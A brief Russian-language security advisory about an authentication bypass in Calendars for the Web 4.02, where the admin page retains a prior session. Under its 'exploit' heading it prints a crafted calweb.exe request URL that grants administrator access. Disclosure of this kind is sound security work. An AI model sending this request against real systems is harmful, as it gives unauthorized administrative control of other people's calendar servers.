Программа: Calendars for the Web 4.02

Уязвимость позволяет удаленному злоумышленнику обойти ограничения
безопасности на целевой системе. Уязвимость существует из-за того, что страница
администрирования сохраняет предыдущую сессию. Атакующий посетивший страницу
администрирования получить доступ с привилегиями администратора на целевую
систему.

Эксплоит:

Перед атакой: target.com/calendarWeb/cgi-bin/calweb/calweb.exe

После атаки:

target.com/calendarWeb/cgi-bin/calweb/calweb.exe?cal=default&vt=6&cmd=900&act=0&dd=2008;10;03;12;00;00;&app=0&format=21x05i9r9s|SnriTmOdoaT&lastcmd=0

Пример:

target.com/calendarWeb/cgi-bin/calweb/calweb.exe?cal=default&vt=6&cmd=900&act=0&dd=2008;10;03;12;00;00;&app=0&format=21x05i9r9s|SnriTmOdoaT&lastcmd=0



Оставить мнение